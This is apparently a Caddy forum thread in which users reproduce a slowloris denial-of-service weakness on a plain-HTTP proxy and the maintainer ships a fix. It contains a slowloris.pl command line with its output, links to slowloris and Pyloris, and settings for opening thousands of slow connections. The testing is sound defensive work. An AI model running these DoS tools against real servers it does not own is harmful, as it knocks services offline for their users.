Non-TLS vulnerable to slowloris attack

Hey, I’ve got a caddy web server running two proxies, one TLS (port 443), and one non TLS (80). When port 443 is attacked by slowloris, the server performs fine and runs without issues. When port 80 is attacked by slowloris, caddy fails to respond to requests to it. The proxy on port 443 still works fine. Both configurations are identical apart from the TLS being on/off & feature rate limiting along with logging. If anybody could help me resolve this issue that would be greatly appreciated, thanks.

Hi, can you show us your Caddyfile and the requests you initiated to see this behavior? Also the client (or client code) you’re using. I want to make sure we reproduce what you’re seeing first.

Sure! Thanks for the hasty reply.

censored:80 {
	proxy / censored:80 {
		proxy_header Host {host}
		proxy_header X-Real-IP {remote}
		proxy_header X-Forwarded-Proto {scheme}
	}

	log
	ratelimit / 3 10 second

	tls off
}

censored {
	proxy / censored:80 {
		proxy_header Host {host}
		proxy_header X-Real-IP {remote}
		proxy_header X-Forwarded-Proto {scheme}
	}

	log
	ratelimit / 3 10 second

	tls censored {
		protocols tls1.0 tls1.2
	}
}

The script used is slowloris, small little perl attack tool.

https://github.com/llaera/slowloris.pl

Thanks. What was the command you used? Having trouble seeing the same thing on my end. What was the output of the slowloris command?

slowloris.pl -dns :80 & slowloris.pl -dns :443

OUTPUT:

Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client by Laera Loris
Defaulting to port 80.
Defaulting to a 5 second tcp connection timeout.
Defaulting to a 100 second re-try timeout.
Defaulting to 1000 connections.
Multithreading enabled.
Connecting to leetv2api2.leet.cc:80:80 every 100 seconds with 1000 sockets:
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.

The log does not contain anything related to the attack. If need be I’m also willing to give you a live demonstration, thanks for the help!

and now of course I am having trouble replicating the issue once again, as is the nature of computers :slight_smile:

This address is malformed. Maybe that’s why?

Thanks for responding quickly to me, if you can confirm that there is in fact an issue here, please come back again ASAP - I have a new release going out Monday or Tuesday. Thank you!

I just did a slowloris experiment against a caddy 0.9.4 server running in a local vagrant box.

I launched caddy with: ulimit -n 8192 && /srv/caddy/caddy_linux_amd64
Verified in /proc/***/limits that the ulimit worked.

My Caddyfile:

http://vagrant {
    root /srv/hc-wwwroot
    gzip
    proxy / 127.0.0.1:8080 {
        except /static /robots.txt
        header_upstream Host {host}
    }
}

Instead of the original slowloris.pl I used Pyloris but the idea is the same – launch a lot of slow requests. After creating ~8000 connections, my browser started showing “502 Bad Gateway” and caddy process was printing:

Activating privacy features... done.
http://vagrant
22/Jan/2017:12:17:37 +0000 [ERROR 502 /about/] dial tcp 127.0.0.1:8080: socket: too many open files

Can you share your Pyloris code? As soon as I can verify this I will issue a fix. And if you give me the code immediately, I can have the fix out by tomorrow or Tuesday.

I cloned this repo: GitHub - Anonymous-Dev/Pyloris: Web stress testing toos with scripting support
Launched it like so: ulimit -n 20000 && python pyloris.py

In the Tkinter GUI window I changed the host address, and changed default limits from 500 to 10000, and reduced time delays to speed things up. Here’s how it looked:

Thanks @cuu508! I’ll have a fix out early next week.

This should be fixed now with https://github.com/mholt/caddy/pull/1368. Thank you!

1 Like

This topic was automatically closed 90 days after the last reply. New replies are no longer allowed.